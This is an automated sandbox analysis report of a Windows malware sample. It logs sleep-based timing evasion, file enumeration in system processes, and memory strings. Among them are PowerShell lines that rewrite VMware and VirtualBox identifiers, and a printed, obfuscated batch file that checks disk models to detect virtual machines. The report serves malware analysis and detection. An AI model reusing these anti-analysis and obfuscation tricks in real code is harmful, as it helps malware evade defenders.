Source: C:\Windows\System32\svchost.exe TID: 1876	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1876	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 528	Thread sleep count: 1553 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 528	Thread sleep time: -155300s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6392	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1480	Thread sleep count: 1224 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1480	Thread sleep time: -122400s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6580	Thread sleep count: 1695 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6580	Thread sleep time: -169500s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4744	Thread sleep count: 151 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4744	Thread sleep time: -151000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1628	Thread sleep count: 1651 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1628	Thread sleep time: -165100s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4072	Thread sleep count: 153 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4072	Thread sleep time: -153000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1888	Thread sleep count: 1691 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1888	Thread sleep time: -169100s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6524	Thread sleep count: 1595 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6524	Thread sleep time: -159500s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4164	Thread sleep count: 1486 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4164	Thread sleep time: -148600s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6696	Thread sleep count: 1761 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6696	Thread sleep time: -176100s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5596	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6164	Thread sleep count: 1770 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6164	Thread sleep time: -177000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5844	Thread sleep count: 1771 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5844	Thread sleep time: -177100s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3128	Thread sleep count: 467 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3128	Thread sleep time: -46700s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3840	Thread sleep count: 180 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3840	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1272	Thread sleep count: 442 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1272	Thread sleep time: -44200s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1992	Thread sleep count: 182 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1992	Thread sleep time: -182000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1848	Thread sleep count: 446 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1848	Thread sleep time: -44600s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6184	Thread sleep count: 440 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6184	Thread sleep time: -44000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1524	Thread sleep count: 1580 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1524	Thread sleep time: -158000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6208	Thread sleep count: 1580 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6208	Thread sleep time: -158000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5972	Thread sleep count: 1540 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5972	Thread sleep time: -154000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2992	Thread sleep count: 1624 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2992	Thread sleep time: -162400s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2292	Thread sleep count: 190 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2292	Thread sleep time: -190000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5340	Thread sleep count: 1588 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5340	Thread sleep time: -158800s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4404	Thread sleep count: 67 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4404	Thread sleep time: -67000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6968	Thread sleep count: 1337 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6968	Thread sleep time: -133700s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5792	Thread sleep count: 1558 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5792	Thread sleep time: -155800s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 2520	Thread sleep count: 397 > 30
Source: C:\Windows\System32\dllhost.exe TID: 2520	Thread sleep time: -39700s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 7108	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6480	Thread sleep count: 1462 > 30
Source: C:\Windows\System32\svchost.exe TID: 6480	Thread sleep time: -146200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6616	Thread sleep count: 1428 > 30
Source: C:\Windows\System32\svchost.exe TID: 6616	Thread sleep time: -142800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1968	Thread sleep count: 1792 > 30
Source: C:\Windows\System32\svchost.exe TID: 1968	Thread sleep time: -179200s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 4256	Thread sleep count: 1252 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 4256	Thread sleep time: -125200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6036	Thread sleep count: 96 > 30
Source: C:\Windows\System32\svchost.exe TID: 8996	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3496	Thread sleep count: 1229 > 30
Source: C:\Windows\System32\svchost.exe TID: 3496	Thread sleep time: -122900s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe	Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E85898DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_000001E85898DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E85898D894 FindFirstFileExW,	8_2_000001E85898D894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589BDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_000001E8589BDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589BD894 FindFirstFileExW,	8_2_000001E8589BD894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_000001E8589EDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589ED894 FindFirstFileExW,	8_2_000001E8589ED894
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_00000140AE86D894 FindFirstFileExW,	9_2_00000140AE86D894
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_00000140AE86DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	9_2_00000140AE86DA18
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DD5CD894 FindFirstFileExW,	12_2_00000195DD5CD894
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DD5CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_00000195DD5CDA18
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DE1ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_00000195DE1ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DE1AD894 FindFirstFileExW,	12_2_00000195DE1AD894
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_00000192913ED894 FindFirstFileExW,	13_2_00000192913ED894
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_00000192913EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	13_2_00000192913EDA18
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_000001929162D894 FindFirstFileExW,	13_2_000001929162D894
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_000001929162DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	13_2_000001929162DA18
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000139F96DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	14_2_00000139F96DDA18
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000139F96DD894 FindFirstFileExW,	14_2_00000139F96DD894
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB3D894 FindFirstFileExW,	15_2_000001160CB3D894
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_000001160CB3DA18
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB9D894 FindFirstFileExW,	15_2_000001160CB9D894
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_000001160CB9DA18
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CBCD894 FindFirstFileExW,	15_2_000001160CBCD894
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CBCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_000001160CBCDA18
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10AD894 FindFirstFileExW,	19_2_00000257E10AD894
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_00000257E10ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10DD894 FindFirstFileExW,	19_2_00000257E10DD894
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_00000257E10DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000001428DD0DA18
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD0D894 FindFirstFileExW,	20_2_000001428DD0D894
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000001428DD3DA18
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD3D894 FindFirstFileExW,	20_2_000001428DD3D894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C93D894 FindFirstFileExW,	21_2_000001F28C93D894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C93DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_000001F28C93DA18
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C96D894 FindFirstFileExW,	21_2_000001F28C96D894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C96DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_000001F28C96DA18
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000001CA9854D894 FindFirstFileExW,	22_2_000001CA9854D894
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000001CA9854DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	22_2_000001CA9854DA18
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26531D894 FindFirstFileExW,	23_2_000001D26531D894
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26531DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	23_2_000001D26531DA18
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26534D894 FindFirstFileExW,	23_2_000001D26534D894
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26534DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	23_2_000001D26534DA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000254A2D4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	24_2_00000254A2D4DA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000254A2D4D894 FindFirstFileExW,	24_2_00000254A2D4D894
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B87DDD894 FindFirstFileExW,	25_2_0000024B87DDD894
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B87DDDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	25_2_0000024B87DDDA18
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B8848DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	25_2_0000024B8848DA18
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B8848D894 FindFirstFileExW,	25_2_0000024B8848D894
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_00000205FD40DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	26_2_00000205FD40DA18
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_00000205FD40D894 FindFirstFileExW,	26_2_00000205FD40D894
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001A2056ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	29_2_000001A2056ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001A2056AD894 FindFirstFileExW,	29_2_000001A2056AD894
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000018EC1F6D894 FindFirstFileExW,	30_2_0000018EC1F6D894
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000018EC1F6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	30_2_0000018EC1F6DA18
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE3E0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	31_2_0000025CE3E0DA18
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE3E0D894 FindFirstFileExW,	31_2_0000025CE3E0D894
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE417D894 FindFirstFileExW,	31_2_0000025CE417D894
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE417DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	31_2_0000025CE417DA18

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: svchost.exe, 0000001A.00000002.3535924993.00000205FABB0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c292b65879ff477a6af604113f58PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 0000001A.00000000.2246600077.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3539564931.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: svchost.exe, 0000001A.00000002.3540590309.00000205FAC43000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmci
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000018.00000000.2228995161.00000254A202B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000014.00000002.3607685052.000001428B138000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: dwm.exe, 0000000F.00000002.3611901630.0000011607ED0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000=
Source: svchost.exe, 0000002F.00000002.3534964991.000001C781F02000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001A.00000003.2262721455.00000205FBEAD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 0000001A.00000000.2251599001.00000205FBA00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: svchost.exe, 0000001A.00000000.2260593598.00000205FD343000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 0000001A.00000002.3591738385.00000205FBAB7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: svchost.exe, 0000002F.00000002.3527580382.000001C781E40000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 0000001A.00000000.2260593598.00000205FD343000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 0000001A.00000002.3535924993.00000205FABB0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f58
Source: svchost.exe, 0000002F.00000002.3526443204.000001C781E2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: svchost.exe, 0000001A.00000003.2252800824.00000205FBA03000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f588
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: cmd.exe, 0000000D.00000003.2167756120.000001929145C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: svchost.exe, 0000001A.00000000.2251599001.00000205FBA00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 0000001A.00000002.3587233517.00000205FB933000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmcir:m
Source: svchost.exe, 0000002F.00000000.2338595191.000001C781E2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: "@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001A.00000000.2246438484.00000205FABD0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2ue).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c292b65879ff477a6af604113f58
Source: $rbx-CO2.bat.10.dr	Binary or memory string: %nCURpbZzgAnHhc%w%opgxmflGhpgmXsyRY%%MzNeIQEEgRTVTyrgZ%m%AzPtbVMCiOchIJ%%TvClkGpTHYuM%i%wHVQtSqzYs%%RrgIPCZjkGacPV%c%ZlFivHjBfATlOPs%%UddtSzHefZkCFvFfUE% %fTQXQIQahVqltSQf%%LBWzEBdwxGVJVOqkWnW%d%fnLczzjO%%QKOpFutHtAsNBtbUq%i%hZaxEUbUyQ%%aesoHGWhuqtXCDMDqE%s%JhinbONtfToKWCOs%%ZyTNeNWVNbyTSq%k%pEgLSQqAUnRngFx%%NkpESLgFulsoMp%d%mCCvrvcAFJYY%%nAQpqGKICMSEyB%r%HxcNFOEKDkg%%LKKUUMGrTucYgEQKQKR%i%ULThGktLIQnfjHZY%%RXRRjxmveGaXUUStnf%v%RCnJsVIdgXOzFRSYM%%aKnGMCDsNOVvMWCZhpD%e%zWAtfxphvf%%VftmuMkPLf% %hUhLkRWF%%CuyAejTBpmwXIMaps%g%hnXzSiyPGmtmyk%%vzBHTikSIAyJdyhhwS%e%PsNcBqbpD%%hcOlhnmyIyBWuoZu%t%vqyeXuqvxHxa%%SSHlByJyWlVJN% %FSXydgRFZeC%%HyPJFPyqFJo%M%NALazeDvj%%KCziuTznTD%o%rQlImFgkwNWDNL%%uRfUBhaGNmjwvER%d%PLBwJArnyxk%%nNZLxRyIiYbAqkxwc%e%LGFvhRmoT%%ASweWnsZnyZDfjkQKbf%l%cUkpMEhSGhzi%%DhpCXDdRyiEjhAwkqhl% %uSFHgssgz%%fYRFCbUoMxcHE%\|%GgEeKIpaoZDLCIw%%lXsedFsBYvqcuNh% %oTbZNnwRdfKRcQz%%RhlfpzIaOdgo%f%nFASQwIHwRX%%AbXVAzhWdkmBbxP%i%alJhhzQzjZ%%uQFuqnEOyLfn%n%ZsoctYQsGxHli%%takxLAnMfyQWnxIrzU%d%fiOlOgkjSNsYjhxkO%%nuMqmmPmwLsK%s%YMncIEOwrAr%%YNAGOQnUdmzlOV%t%wBJzQiyulWfOF%%RWUvUnzoFIUfPlMmcnM%r%sUHaBnAs%%KJbHUmpFPUId% %VbFLsmIYT%%cDHWpTTHMgYVZSxVZw%/%mteZjYFvPUoKrQ%%ZemqaLWmVWjacNnxml%i%HxYExXJydNy%%HfhStIJvVqhica% %CHCxbyajtbAOsqnSy%%BBUVUTODQvrqPC%/%YhQBqwXHWNRT%%qfIxILAydHNIIxIERd%c%XrujwriaDU%%icaVnKMTHdbYUAcSHYo%:%eJFVCVWl%%zLXEfyKHNkX%"%YwiWszJtyAboSTyx%%trOBMhseuP%Q%skUOrkfn%%ZjwnSIYJILlamC%E%SjqmoPSXKHb%%GmXHOlafjVBJ%M%iJvIDbfH%%WiTTYHglMFQuswK%U%xOmxkXHH%%ffwogGWFfqP% %VmtYXiWSIQmLEgm%%kqZAlKTBKWFYUOngVp%H%CTymOLPzpTKJa%%dvOqoCksRobDX%A%UCgQpEKZMekPwkEIZ%%FFQtzPGNrjck%R%lNQFMNUuwJ%%IKfyfZOioO%D%shAdqjBmAXCTZbFFR%%fSiVNKOJhHruTVxnvJf%D%wKTjjfgQgxAuXm%%VOwuPoGcUUf%I%GwMGWziy%%YYMHEYDKhXxHN%S%yYoquQIZpdbAu%%QDUONOXPKNkqc%K%MXHwTVnHHjN%%LZJIFeDjTEcJTYEI%"%BfeNrmsvFG%%gjVLbfdXgchgMS% %iVYDUrEtgeJU%%NrmaxedKIrINV%/%CluYrUTexxbMiC%%PGrlIjOQhJIPNzDqQ%c%KbiMfrZAJUPYLWAVT%%qBmxNvmpJegEThlMx%:%GcBalhzUaiXLp%%FTZoMmnNzQHUufbHNY%"%aoQjqpeXTuer%%PnYahWZlmSDKsrNuTtu%D%noDOJJYIputuyKegg%%ARZnNvnyXY%A%CabJsKAKjqx%%rVSzimImGoRSDZZBiBl%D%ZqMtsLfZDwWKdSH%%UVfmpLLniigsL%Y%CIfLYajzhxgIJjshP%%rHGmwYwoFykjENnEU% 